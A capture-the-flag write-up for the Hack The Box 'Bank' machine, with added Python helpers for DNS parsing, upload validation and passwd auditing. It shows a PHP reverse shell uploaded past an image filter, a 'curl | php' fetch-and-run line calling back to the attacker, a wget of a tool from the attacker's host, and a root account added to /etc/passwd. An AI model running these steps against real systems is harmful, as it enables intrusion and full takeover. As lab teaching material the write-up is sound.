Hacking.BG - HTB WriteUps


h3xu


# Enumeration
### NMAP

The nmap scan shows ports 22, 53 and 80 open: OpenSSH 6.6.1p1, ISC BIND 9.9.5 and Apache 2.4.7. The Apache title is the stock "Apache2 Ubuntu Default Page", so the real web application is probably only reachable under a proper virtual-host name, and an authoritative DNS server on the same box is the obvious place to look for such names. Let's enumerate DNS first and then check the findings in our browser.

```
Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```


### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3)


BIND on the target answers AXFR requests from arbitrary clients (our attack box is nobody's secondary name server), so the whole zone comes back in a single query:

```
# dig axfr @10.10.10.29 bank.htb

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)
```

# Web App Enumeration
#### /etc/hosts
Map the target IP to the names leaked by the zone transfer in /etc/hosts. Note that chris.bank.htb comes from the SOA RNAME field, which is the zone contact mailbox (chris@bank.htb) with the "@" written as a ".", not a host record; adding it alongside the real names costs nothing:

```
10.10.10.29        bank.htb chris.bank.htb ns.bank.htb
```

Then browse to bank.htb, chris.bank.htb and ns.bank.htb.
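Turning a zone transfer into hosts entries by hand is error-prone once a zone has more than a handful of records. The following Python script is an added example (not part of the original write-up): it parses `dig axfr` output, collects every name the zone claims exists, separates the SOA contact mailbox from real hosts, and prints the /etc/hosts line. The sample input is the transfer shown above; `parse_axfr()`, `hostnames()`, `soa_contact()` and `hosts_line()` are hypothetical helper names.

```python
"""Turn the records leaked by a successful zone transfer into an /etc/hosts line.

Added example, not part of the original write-up. The sample input is the AXFR
output from the write-up; the helper names are hypothetical.
"""
import re

# Sample input, constructed from the dig output above (comment lines are skipped).
SAMPLE_AXFR = """\
; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
"""

# owner  TTL  IN  TYPE  rdata...
RECORD = re.compile(r"^(?P<owner>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.+)$")


def parse_axfr(text):
    """Return (owner, type, rdata_fields) for every resource record in dig axfr output."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RECORD.match(line)
        if m:
            records.append((m["owner"].rstrip("."), m["type"], m["rdata"].split()))
    return records


def hostnames(records):
    """Every name the zone says exists: A/AAAA/CNAME owners plus NS targets, sorted and deduplicated."""
    names = set()
    for owner, rtype, rdata in records:
        if rtype in ("A", "AAAA", "CNAME"):
            names.add(owner)
        elif rtype == "NS":
            names.add(rdata[0].rstrip("."))
    return sorted(names)


def soa_contact(records):
    """The SOA RNAME is a mailbox with the '@' written as '.', not a host to browse to."""
    for owner, rtype, rdata in records:
        if rtype == "SOA":
            user, _, domain = rdata[1].rstrip(".").partition(".")
            return f"{user}@{domain}"
    return None


def hosts_line(records, ip):
    """One /etc/hosts line pointing every discovered name at the target IP."""
    return f"{ip:<18} " + " ".join(hostnames(records))


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print(hosts_line(recs, "10.10.10.29"))
    print("SOA contact:", soa_contact(recs))
```

Against a live target you would feed the script the output of `dig axfr @<ip> <zone>`; the parser deliberately ignores the `;` comment lines and the duplicated closing SOA, and the `www` CNAME is picked up as a name worth adding even though the write-up's hosts line left it out.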
 

#### Dirbuster

Dirbuster finds a couple of interesting directories on http://bank.htb, including /balance-transfer/, which is not visible in the screenshot.

The *user* and *ticket* files return nothing but the page footer; /balance-transfer/, on the other hand, does:

#### /balance-transfer/
/balance-transfer/ is a directory listing of a bunch of encrypted account exports. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files.

When opened, it seems that encryption failed, since it is in plain text:

```
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
```
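Scrolling a long autoindex page for the one file that looks different is exactly the kind of thing worth scripting. The following Python script is an added example, not part of the original write-up: it parses an Apache directory listing into (name, size) pairs and flags files whose size is far from the median, which is how the unencrypted export stands out. The listing embedded below is constructed in the shape of an Apache autoindex page; the file names and sizes are made up and are not the real contents of /balance-transfer/. `parse_autoindex()` and `size_outliers()` are hypothetical helper names.

```python
"""Spot the odd file in an Apache directory listing by size.

Added example, not from the original write-up. SAMPLE_INDEX is a constructed
autoindex page, not the real /balance-transfer/ listing.
"""
import re
from statistics import median

# One autoindex data row: file link, last-modified cell, size cell (with optional K/M/G suffix).
ROW = re.compile(
    r'<a href="(?P<name>[^"?/][^"]*)">.*?'                         # skips ?C=.. sort links and "/"
    r'<td align="right">[^<]*</td>'                                  # last-modified cell
    r'<td align="right">\s*(?P<size>[\d.]+)(?P<unit>[KMG]?)\s*</td>',
    re.S,
)
UNIT = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def _row(name, size):
    """Build one autoindex table row (used only to construct the sample page)."""
    return (f'<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td>'
            f'<td><a href="{name}">{name}</a></td><td align="right">2017-06-14 13:36  </td>'
            f'<td align="right">{size} </td><td>&nbsp;</td></tr>')


# Constructed sample: eight "encrypted" exports of about the same size and one short one.
SAMPLE_INDEX = (
    '<html><body><h1>Index of /balance-transfer</h1><table>'
    '<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=S;O=A">Size</a></th></tr>'
    '<tr><td valign="top"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td>'
    '<td align="right">  - </td></tr>'
    + "".join(_row(n, s) for n, s in [
        ("0a1b2c3d.acc", 584), ("1b2c3d4e.acc", 586), ("2c3d4e5f.acc", 583),
        ("3d4e5f60.acc", 585), ("4e5f6071.acc", 584), ("5f607182.acc", 290),
        ("60718293.acc", 587), ("718293a4.acc", 584), ("8293a4b5.acc", 585),
    ])
    + '</table></body></html>'
)


def parse_autoindex(html):
    """Return [(name, size_in_bytes)] for every file row of an Apache autoindex page."""
    entries = []
    for row in html.split("<tr>"):          # one regex match per row, so rows never bleed together
        m = ROW.search(row)
        if m:
            entries.append((m["name"], int(float(m["size"]) * UNIT[m["unit"]])))
    return entries


def size_outliers(entries, tolerance=0.4):
    """Files whose size differs from the median by more than `tolerance` (a fraction)."""
    if not entries:
        return []
    mid = median(size for _, size in entries)
    return [(n, s) for n, s in entries if abs(s - mid) / mid > tolerance]


if __name__ == "__main__":
    files = parse_autoindex(SAMPLE_INDEX)
    print(f"{len(files)} files, median {median(s for _, s in files):.0f} bytes")
    for name, size in size_outliers(files):
        print(f"outlier: {name} ({size} bytes)")
```

On a real engagement the HTML comes from `curl http://bank.htb/balance-transfer/`; the median-based threshold is used rather than a fixed byte count so the script also works when the "normal" size is not known in advance.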


 

# Exploit
I logged in with the recovered account and discovered a Support page that provides a file-upload function, which is a likely attack surface.

## File Upload Bypass

The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with Burp Suite.

#### Burp Suite
After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it through the file-upload form with *intercept on*. After we capture the POST request, we send it to Repeater in order to work around the restrictions in place. And voila...


## Shell

Open a nc listener to catch the callback, then fetch the uploaded file. Note what this command really does: Apache does not map .jpeg to the PHP handler, so curl just downloads the script's source, and the pipe feeds it to the local php interpreter, which connects back to our own listener:

```
$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5492  100  5492    0     0  53843      0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice:  Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234
```

***yikes***, I just hacked myself 😄

Anyway... let's try to forget about that and figure out my next move. I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes, and that files with that extension are executed as PHP. So I uploaded the reverse shell as an .htb file and simply opened it, which returned a shell.


```
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 12:37:52 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 
```
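The lesson of this section is that an upload filter which trusts client-supplied data (the file name, the Content-Type header) is defeated with nothing more than Repeater, and that any extension the web server's handler map executes must be refused regardless of what the allow-list says. The following Python script is an added example and is not the Bank application's own code: it places a validator of the bypassable kind next to a hardened one and runs both over the same constructed submissions. The policy sets are hypothetical (the ".htb" entry stands in for the debugging alias the write-up describes), `weak_accept()`, `hardened_accept()` and `run_cases()` are hypothetical names, and the file contents are constructed.

```python
"""An upload check of the kind Burp Repeater gets past, next to a hardened one.

Added example, not the Bank application's own code. Policy sets, function names
and sample submissions are hypothetical/constructed.
"""
import os
import secrets

IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}
# What the web server's handler map would run as code. Nothing here may ever be
# reachable through the upload, whatever the allow-list says (".htb" is the
# debugging alias from the write-up; the others are common PHP handler names).
SERVER_EXECUTES = {"php", "phtml", "php3", "php5", "phar", "htb"}
# Magic bytes for the image types we accept (jpg and jpeg share a signature).
MAGIC = {b"\xff\xd8\xff": "jpeg", b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif", b"GIF89a": "gif"}
CANON = {"jpg": "jpeg"}

# Constructed contents: a JPEG header with padding, and a harmless PHP placeholder.
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 16
PHP_BYTES = b"<?php echo 'placeholder'; ?>"


def weak_accept(filename, client_mime, data):
    """The bypassable pattern: trusts the Content-Type the client sent and only
    deny-lists a couple of extensions. Both inputs are attacker-controlled, so a
    proxy can set image/jpeg and pick any extension not on the short list."""
    if not client_mime.startswith("image/"):
        return False
    ext = filename.lower().rsplit(".", 1)[-1]
    return ext not in {"php", "phtml"}


def hardened_accept(filename, client_mime, data):
    """Ignore the client MIME type. Allow-list the final extension, refuse anything
    the server executes, require the content's magic bytes to match that extension,
    and store under a server-generated name. Returns the stored name, or None."""
    base = os.path.basename(filename)          # drop any directory components
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()       # only the LAST extension decides
    if ext not in IMAGE_EXT or ext in SERVER_EXECUTES:
        return None
    kind = next((k for magic, k in MAGIC.items() if data.startswith(magic)), None)
    if kind is None or kind != CANON.get(ext, ext):
        return None
    return f"{secrets.token_hex(16)}.{ext}"   # original name never reaches the filesystem


# Constructed submissions: a real image, a PHP file, the .php.jpeg and the .htb trick.
CASES = [
    ("photo.jpg", "image/jpeg", JPEG_BYTES),
    ("shell.php", "image/jpeg", PHP_BYTES),
    ("php-reverse-shell.php.jpeg", "image/jpeg", PHP_BYTES),
    ("shell.htb", "image/jpeg", PHP_BYTES),
]


def run_cases(cases=CASES):
    """Map each file name to (weak verdict, hardened verdict) as booleans."""
    return {name: (weak_accept(name, mime, data), hardened_accept(name, mime, data) is not None)
            for name, mime, data in cases}


if __name__ == "__main__":
    for name, (weak, hard) in run_cases().items():
        print(f"{name:28} weak={('accept' if weak else 'reject'):6} "
              f"hardened={'accept' if hard else 'reject'}")
```

The hardened version still has to be paired with server-side configuration: the uploads directory should carry no script handler at all, because an allow-list in the application cannot undo a `.htb`-style alias that lives in the web server's configuration.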

 

# Privilege Escalation

We are logged in as www-data. To map the local attack surface I will run a script called unix-privesc-check. In the following lines I change to /tmp, because it is a writable directory, and download the script from my local Kali system over a Python HTTP server.


```
┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .

┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -
```


```
$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15--  http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'

     0K .......... .......... .......... .....                100%  654K=0.05s

2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]

$ 
```

Let's upgrade our session to a proper interactive TTY: spawn a pty with Python, background the nc session with Ctrl-Z, switch the local terminal to raw mode without echo so that control keys are passed through to the remote shell, and bring nc back to the foreground.

```
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bank:/tmp$ export TERM=xterm
export TERM=xterm
www-data@bank:/tmp$ ^Z
zsh: suspended  nc -nlvp 1234

┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg
[1]  + continued  nc -nlvp 1234
```


Now I have tab-completion and all keys register as normal.

```
www-data@bank:/tmp$ chmod +x unix-privesc-check

www-data@bank:/tmp$ ./unix-privesc-check standard

...[snip]...
############################################
    Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
```

So /etc/passwd is world-writable, and that is all it takes: anyone who can write to it can append an account with UID 0 and GID 0, and if the password field holds a hash instead of "x", authentication uses that hash directly rather than consulting /etc/shadow. First, create an MD5-crypt password hash:

```
$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1
```


Next, add the user as follows:

```
www-data@bank:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
www-data@bank:/$ su hacker
Password: 
root@bank:/# whoami
root
root@bank:/# 
```
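The same hash and passwd line can be produced and checked without openssl, which is useful on a box that lacks it and when writing the detection for this technique. The following Python script is an added example, not part of the original write-up: `md5_crypt()` is a from-scratch implementation of the `$1$` scheme that `openssl passwd -1` uses (the algorithm from FreeBSD's crypt-md5.c), `passwd_entry()` builds the line added above, and `extra_uid0_accounts()` is the defender's side, flagging any non-root UID 0 account or any entry carrying a hash instead of "x". The helper names and `SAMPLE_PASSWD` are hypothetical/constructed and are not the target's real file.

```python
"""Reproduce the /etc/passwd entry from the write-up without openssl, and audit for it.

Added example, not part of the original write-up. md5_crypt() follows the
FreeBSD crypt-md5.c algorithm; the other helpers and SAMPLE_PASSWD are constructed.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)'s little-endian base-64 variant, `count` characters of 6 bits each."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5_crypt(password, salt):
    """MD5-crypt ($1$) as produced by `openssl passwd -1`; salt is at most 8 characters."""
    pw, s = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + s)
    alt = hashlib.md5(pw + s + pw).digest()
    n = len(pw)
    while n > 0:                       # as many bytes of md5(pw, salt, pw) as pw is long
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                           # the "something really weird" step of the original
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):              # fixed 1000-round stretching
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(s)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups)
    enc += _to64(final[11], 2)
    return f"$1${s.decode()}${enc}"


def passwd_entry(user, password, salt, uid=0, gid=0, home="/root", shell="/bin/bash"):
    """A passwd line with the hash inline; a non-'x' password field sidesteps /etc/shadow."""
    return f"{user}:{md5_crypt(password, salt)}:{uid}:{gid}:{user}:{home}:{shell}"


def extra_uid0_accounts(passwd_text):
    """Detection side: every account other than root with UID 0, and every entry whose
    password field holds a hash rather than 'x' (or a locked marker)."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((name, "uid 0"))
        if pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((name, "hash in passwd field"))
    return findings


# Constructed passwd file: two stock accounts plus the line added in the write-up.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
    passwd_entry("hacker", "hacker", "hacker"),
])

if __name__ == "__main__":
    print(passwd_entry("hacker", "hacker", "hacker"))
    for name, why in extra_uid0_accounts(SAMPLE_PASSWD):
        print(f"{name}: {why}")
```

The audit function is the check to drop into a file-integrity or host-monitoring job: on a healthy system it returns an empty list, and either finding is a strong indicator that someone has done exactly what this write-up does.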
